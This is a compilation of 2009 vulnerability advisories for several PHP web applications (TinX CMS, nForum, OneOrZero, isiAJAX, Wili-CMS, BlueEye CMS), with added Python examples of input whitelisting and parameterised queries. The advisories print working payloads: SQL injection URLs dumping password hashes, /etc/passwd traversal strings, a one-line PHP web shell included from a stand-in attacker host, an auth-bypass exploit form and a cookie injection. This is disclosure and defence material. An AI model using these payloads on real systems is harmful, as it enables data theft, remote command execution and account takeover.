http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp

TinX CMS 3.x SQL Injection Vulnerability

TinX CMS SQL Injection vulnerability

Affected Software

TinX CMS
Versions 3.x prior to 3.5.1

Product Link:
http://sourceforge.net/project/showfiles.php?group_id=133415


Severity Rating

Severity: High
Impact: SQL Injection
Attack Vector: Remote

CVSS v2:
Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)

CVE: CVE-2009-0825


Software Description

TinX CMS is content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).


Vulnerability Description

Positive Technologies Research Team has discovered a SQL Injection vulnerability in TinX CMS.

User input passed to the "id" parameter is not properly sanitized before being used in a SQL query. This allows remote attackers to execute arbitrary SQL commands via the "id" parameter.

Example:
http://[server]/system/rss.php?id=1'SQL-code

SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an unsecured programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems.


Solution

Update to version 3.5.1.


Disclosure Timeline

04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
05/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure


Credits

This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.


References

http://en.securitylab.ru/lab/PT-2009-13
http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp

nForum 1.5 Multiple SQL Injection

Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/

Bugs: [A] Multiple SQL Injection

Exploitation: Remote
Date: 06 Mar 2009

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

- [A] Multiple SQL Injection

Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php

These bugs allow a guest to retrieve the username and
password hash of a registered user.

Code

- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23

Fix
No fix.

OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability

Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads

[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd

Bug: ./oozv1657/common/login.php (line: 104)

require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)

Greetz: D3m0n_DE * str0ke * and otherz..

[ dun / 2009 ]

# milw0rm

isiAJAX v1 (praises.php id) Remote SQL Injection Vulnerability

Script site: http://isiajax.sourceforge.net/
Download: http://sourceforge.net/project/showfiles.php?group_id=169754

[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--

Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)

$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
Greetz: D3m0n_DE * str0ke * and otherz..

[ dun / 2009 ]

# milw0rm

Wili-CMS 0.4.0 (RFI/LFI/AB) Multiple Remote Vulnerabilities

Application: Wili-CMS
Version: 0.4.0
Website: http://wili-cms.sourceforge.net/

Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass

Exploitation: Remote

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

- [A] Multiple Remote/Local File Inclusion

Requisites: none
File affected: index.php

This bug allows a guest to include remote and local files
and, through a remote file, to execute commands on the server.

...

if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}

...

include( template_file( $globals['root_template'] ) );


- [B] Authentication Bypass

Requisites: magic_quotes_gpc = off
File affected: lib/admin/init_session.php

This bug allows a guest to login as admin.

...

$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];

...

$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );

// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);

if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}

...

Code


- [A] Multiple Remote/Local File Inclusion

shell.txt: <?php system($_GET['cmd']); ?>

http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt&cmd=ls

http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd
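S.Builder (binn_include_path), OneOrZero (default_language) and Wili-CMS (content_dir) all build an include path by concatenating request data with a directory and, in two cases, a fixed suffix; the suffix is no defence, because a remote URL or a traversal sequence is honoured before it matters. The Python 3 code below is an added example, not code from any of the three projects: a triage function that labels the published PoC values the way a log reviewer would, and a whitelist-then-contain check in the shape a fix for the OneOrZero language include would take. The regular expression, the tempdir used as a stand-in for the lang/ directory and the ".lang.php" suffix handling are assumptions for the example.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit

# Added example; not S.Builder, OneOrZero or Wili-CMS code.
# Assumed shape of a legitimate language name ("en", "fr", "pt-BR"). Everything
# else, including '/', '\\', '.', ':', '?' and NUL, fails the match.
NAME_RE = re.compile(r"^[A-Za-z]{2,8}(?:[_-][A-Za-z]{2,8})?$")

REMOTE_SCHEMES = ("http", "https", "ftp", "php", "data")


def classify_include_value(value):
    """Label a request value destined for include(): nul, remote, traversal, ok or unexpected."""
    if "\x00" in value:
        # PHP before 5.3.4 truncated include paths at a NUL byte, which is why an
        # appended suffix such as ".lang.php" never protected these scripts.
        return "nul"
    if urlsplit(value).scheme in REMOTE_SCHEMES:
        # Only fetched when allow_url_fopen=On (and allow_url_include=On on PHP >= 5.2).
        return "remote"
    parts = value.replace("\\", "/").split("/")
    if ".." in parts or value.startswith(("/", "\\")):
        return "traversal"
    return "ok" if NAME_RE.match(value) else "unexpected"


def resolve_language_file(lang_dir, requested):
    """Absolute path of <lang_dir>/<requested>.lang.php, or None if the value is rejected.
    The whitelist does the real work; the realpath containment check is defence in depth."""
    if classify_include_value(requested) != "ok":
        return None
    base = os.path.realpath(lang_dir)
    candidate = os.path.realpath(os.path.join(base, requested + ".lang.php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo():
    """Run the page's PoC values through both checks against a throwaway lang/ dir."""
    lang_dir = tempfile.mkdtemp(prefix="lang-")        # stand-in for ./lang/
    samples = [
        "en",                                           # legitimate
        "../../../../../../../../../../etc/passwd",     # OneOrZero / Wili-CMS LFI value
        "http://evil.site.com/shell.txt?",              # S.Builder / Wili-CMS RFI value
        "en\x00",                                       # NUL-truncation variant
    ]
    labels = {s: classify_include_value(s) for s in samples}
    resolved = {s: resolve_language_file(lang_dir, s) for s in samples}
    return labels, resolved


if __name__ == "__main__":
    labels, resolved = demo()
    for value in labels:
        print("%-45r %-10s %s" % (value, labels[value], resolved[value]))
```

The order of the tests matters: the NUL check runs first because a NUL also breaks `urlsplit` and path handling, and the scheme check runs before the traversal check so that `http://evil.site.com/../x` is reported as remote rather than as a traversal.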


- [B] Authentication Bypass

<html>
<head>
<title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
</head>
<body>
<form action="http://www.site.com/path/admin.php" method="POST">
<input type="text" name="uname" value="admin">
<input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
<input type="hidden" name="mode" value="loggedin">
<input type="hidden" name="npage" value="1">
<input type="submit" value="Exploit">
</form>
</body>
</html>

Fix

No fix.

# milw0rm

Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability

BlueEye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
found by ka0x

Download: http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar
need magic_quotes_gpc = Off

- Vuln code:

10: if (!empty($_COOKIE["BlueEyeCMS_login"])) { // --> Only??
11: $c_login = $_COOKIE["BlueEyeCMS_login"]; // --> Not clean??
12: $c_pass = $_COOKIE["BlueEyeCMS_pass"];
13: $c_key = $_COOKIE["BlueEyeCMS_key"];
....
16: $table = $db_prefix."users";
17: $query = mysql_query("SELECT id FROM `$table` WHERE `user` = '$c_login' AND `password` = '$c_pass' AND `key` = '$c_key'"); // -> VULN
18: $rows = mysql_num_rows($query); // -> num rows of the query
19: $result = mysql_fetch_array($query);
....
21: if ($rows == 1) { // -> check if exists one row..
22: $logged = $c_login;
23: $logged_id = $result['id'];
24: }
....
204: img src="http://www.blogger.com/%5C" / Logged as: ".$logged." (ID: ".$logged_id.")

Proof Of Concept:
javascript:document.cookie = "BlueEyeCMS_login=' UNION SELECT concat(user,0x3A,password) FROM blueeye_users WHERE id=1/*; path=/";
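The nForum, isiAJAX and BlueEye payloads above are UNION-based data extraction, and the Wili-CMS password payload is the same trick used only to make the login query return a row. The Python 3 code below is an added example, not code from any of those projects: it replays both shapes against an in-memory SQLite database so the effect of string-built queries can be seen next to the parameterised form. The schema, the sha256-based stand-in for MySQL's PASSWORD(), the CONCAT shim and the payload strings adapted to SQLite (a `-- ` comment instead of `#` or `/*`, and `':'` instead of `0x3a`, which SQLite reads as an integer) are all constructed for the example.

```python
import hashlib
import sqlite3

# Added example; not nForum, Wili-CMS or BlueEye code.
# The page's payloads adapted to SQLite syntax (constructed):
UNION_DUMP = "-1' UNION ALL SELECT 1,2,CONCAT(name,':',passwd_hash) FROM users-- "
AUTH_BYPASS = "1') UNION ALL SELECT 1-- "


def password_hash(s):
    """Stand-in for MySQL's PASSWORD(); the hash algorithm is irrelevant to the injection."""
    return hashlib.sha256(str(s).encode()).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("PASSWORD", 1, password_hash)
    conn.create_function("CONCAT", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, passwd_hash TEXT, adminflag INTEGER);
        CREATE TABLE themes(id INTEGER, title TEXT, body TEXT);
        INSERT INTO themes VALUES (1, 'Welcome', 'first post');
    """)
    conn.execute("INSERT INTO users VALUES (1, 'admin', PASSWORD('s3cret'), 1)")
    return conn


# --- showtheme.php-style lookup: data extraction via UNION ---------------------

def showtheme_vulnerable(conn, theme_id):
    # Same mistake as the PHP above: the request value is spliced into the SQL text.
    sql = "SELECT id, title, body FROM themes WHERE id='%s'" % theme_id
    return conn.execute(sql).fetchall()


def showtheme_safe(conn, theme_id):
    # Bound parameter: the value can never change the statement's structure.
    return conn.execute("SELECT id, title, body FROM themes WHERE id=?", (theme_id,)).fetchall()


# --- init_session.php-style login: row-count bypass via UNION ------------------

def admin_login_vulnerable(conn, uname, password):
    sql = ("SELECT id FROM users WHERE name='%s' AND adminflag=1 "
           "AND passwd_hash=PASSWORD('%s')") % (uname, password)
    rows = conn.execute(sql).fetchall()
    # Wili-CMS trusts "a row came back" as "the password matched"; the UNION
    # supplies that row (and the attacker-chosen uid 1) without any password.
    return rows[0][0] if rows else None


def admin_login_safe(conn, uname, password):
    rows = conn.execute(
        "SELECT id FROM users WHERE name=? AND adminflag=1 AND passwd_hash=PASSWORD(?)",
        (uname, password)).fetchall()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable showtheme:", showtheme_vulnerable(db, UNION_DUMP))
    print("safe showtheme:      ", showtheme_safe(db, UNION_DUMP))
    print("vulnerable login uid:", admin_login_vulnerable(db, "admin", AUTH_BYPASS))
    print("safe login uid:      ", admin_login_safe(db, "admin", AUTH_BYPASS))
```

With magic_quotes_gpc=On the single quote in each payload would arrive as `\'` and the injection would fail, which is exactly the requisite the advisories state; the parameterised versions do not depend on that setting. The BlueEye cookie payload is the showtheme shape with the cookie value as the injection point, so the same pair of functions applies to it.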

# milw0rm